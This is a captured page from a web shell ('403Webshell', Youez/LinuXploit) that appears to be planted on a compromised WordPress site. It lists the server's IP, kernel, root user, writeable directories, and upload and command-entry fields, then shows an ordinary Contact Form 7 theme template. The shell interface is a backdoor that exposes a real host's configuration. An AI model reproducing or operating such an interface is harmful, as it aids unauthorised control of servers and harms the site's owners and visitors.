403Webshell
Server IP : 130.225.57.55  /  Your IP : 216.73.216.60
Web Server : Apache
System : Linux wp-vhost07 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /srv/www/reco2st.eu/https/wp-content/themes/erc04961/elements/form/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /srv/www/reco2st.eu/https/wp-content/themes/erc04961/elements/form/cf7-contact.php
<?php
/**
 * CF7-Template: Contact
 */
?>

<div class="contact-form">

    <div class="contact-form__item">
        [text* fullname  placeholder "<?php _e( 'Full Name','erc001' ); ?>"]
    </div>

    <div class="contact-form__item">
        [email* email placeholder "<?php _e( 'Email','erc001' ); ?>"]
    </div>

    <div class="contact-form__item">
        [textarea* message 40x3 placeholder "<?php _e( 'Message','erc001' ); ?>"]
    </div>

    <?php
    $disclaimer = get_field('contact_disclaimer', 'options');
    if ($disclaimer) : ?>
        <div class="contact-form__item"><?php echo $disclaimer; ?></div>
    <?php endif; ?>

    <div class="contact-form__item--submit">
        <button class="wpcf7-form-control wpcf7-submit btn btn__arrow">
            <span class="btn__text"><?php MOZ_Utils::upper( __('Submit', 'erc001')); ?></span>
            <span class="btn__icon"><?php MOZ_SVG::svg( 'arrow' ); ?></span>
        </button>
    </div>

</div>

Youez - 2016 - github.com/yon3zu
LinuXploit